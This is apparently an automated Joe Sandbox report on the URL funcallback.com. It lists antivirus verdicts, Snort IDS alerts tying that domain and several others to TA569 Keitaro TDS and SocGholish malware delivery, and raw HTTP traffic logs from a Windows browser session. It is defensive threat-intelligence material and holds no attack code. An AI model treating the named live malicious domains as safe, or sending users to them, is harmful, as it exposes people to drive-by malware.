Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://funcallback.com

Overview

General Information

Sample URL:https://funcallback.com
Analysis ID:1430945
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://funcallback.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1856,i,12264961050259194225,6932832445038562369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:04/24/24-12:12:27.557478
SID:2051078
Source Port:49706
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:26.633474
SID:2051077
Source Port:65312
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:23.723220
SID:2051078
Source Port:49923
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:39.865257
SID:2051077
Source Port:53352
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:01.687724
SID:2051077
Source Port:61409
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:13:00.595648
SID:2051078
Source Port:49731
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:34.835077
SID:2051078
Source Port:49716
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:16.500346
SID:2050722
Source Port:49915
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:01.687584
SID:2051077
Source Port:54072
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.016494
SID:2050098
Source Port:53373
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:16.496004
SID:2051024
Source Port:49914
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:45.920377
SID:2051078
Source Port:49727
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.571531
SID:2050722
Source Port:49876
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.014789
SID:2051023
Source Port:59226
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.016644
SID:2050098
Source Port:55154
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:27.558200
SID:2051078
Source Port:49707
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.015121
SID:2050719
Source Port:55473
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:12.313427
SID:2051078
Source Port:49896
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:26.633270
SID:2051077
Source Port:55204
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:39.864927
SID:2051077
Source Port:58351
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:11.547342
SID:2051024
Source Port:49892
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:45.921271
SID:2051078
Source Port:49728
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.015009
SID:2050719
Source Port:53384
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.170267
SID:2051024
Source Port:49874
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:12:34.834756
SID:2051078
Source Port:49715
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:01.884129
SID:2051078
Source Port:49851
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:06.014671
SID:2051023
Source Port:55405
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:26.818073
SID:2050722
Source Port:49929
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/24/24-12:14:26.818278
SID:2051024
Source Port:49928
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://funcallback.comAvira URL Cloud: detection malicious, Label: malware
Source: https://funcallback.com/favicon.icoAvira URL Cloud: Label: malware
Source: https://cdnreport.net/browser.php?pixel=1&os=win&browser=chrome&domain=exodontia.infoAvira URL Cloud: Label: malware
Source: http://funcallback.com/Avira URL Cloud: Label: malware
Source: https://funcallback.comVirustotal: Detection: 20%Perma Link
Source: https://funcallback.com/HTTP Parser: No favicon
Source: https://dentalhealthstop.co.uk/HTTP Parser: No favicon
Source: https://dentalhealthstop.co.uk/HTTP Parser: No favicon
Source: https://dentalhealthstop.co.uk/contact/HTTP Parser: No favicon
Source: https://www.google.com/maps/embed/v1/place?key=AIzaSyCeLSdqTKK24QTZ2fgw9w5olAcpwi4Hbw0&q=52.620904,+-2.129217HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.3.84.131:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.3.84.131:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49744 version: TLS 1.2

Networking

barindex
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:55204 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:65312 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49706 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49707 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49716 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49715 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:58351 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:53352 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49728 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49727 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49731 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:54072 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051077 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (funcallback .com) 192.168.2.16:61409 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49851 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051023 ET TROJAN SocGholish Domain in DNS Lookup (stake .libertariancounterpoint .com) 192.168.2.16:55405 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051023 ET TROJAN SocGholish Domain in DNS Lookup (stake .libertariancounterpoint .com) 192.168.2.16:59226 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2050719 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (gspiceyl .com) 192.168.2.16:53384 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2050719 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (gspiceyl .com) 192.168.2.16:55473 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2050098 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (debasesingle .life) 192.168.2.16:53373 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2050098 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in DNS Lookup (debasesingle .life) 192.168.2.16:55154 -> 1.1.1.1:53
Source: TrafficSnort IDS: 2051024 ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) 192.168.2.16:49874 -> 185.158.251.240:443
Source: TrafficSnort IDS: 2050722 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com) 192.168.2.16:49876 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051024 ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) 192.168.2.16:49892 -> 185.158.251.240:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49896 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051024 ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) 192.168.2.16:49914 -> 185.158.251.240:443
Source: TrafficSnort IDS: 2050722 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com) 192.168.2.16:49915 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051078 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (funcallback .com) 192.168.2.16:49923 -> 31.41.44.109:443
Source: TrafficSnort IDS: 2051024 ET TROJAN SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) 192.168.2.16:49928 -> 185.158.251.240:443
Source: TrafficSnort IDS: 2050722 ET CURRENT_EVENTS TA569 Keitaro TDS Domain in TLS SNI (gspiceyl .com) 192.168.2.16:49929 -> 31.41.44.109:443
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 23.3.84.131
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://funcallback.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=c9UsdYNfmbzDR9B&MD=kM2l1z7B HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: funcallback.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGJW2o7EGIjAU1L_RxYWudeI86V8AGKeKfMmLlrdsuxmEeq70V3aj7ogSuF2qhg4943Yd42ws9qYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Ffuncallback.com&oit=3&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: funcallback.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /home HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGKu2o7EGIjAHapbwJWFN81vbrTVHxih3IxRnJnlsIfGDHytyY_qFMz8PDPkJxODMm7YzS8pcVpcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /home HTTP/1.1Host: funcallback.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=den&oit=1&cp=3&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
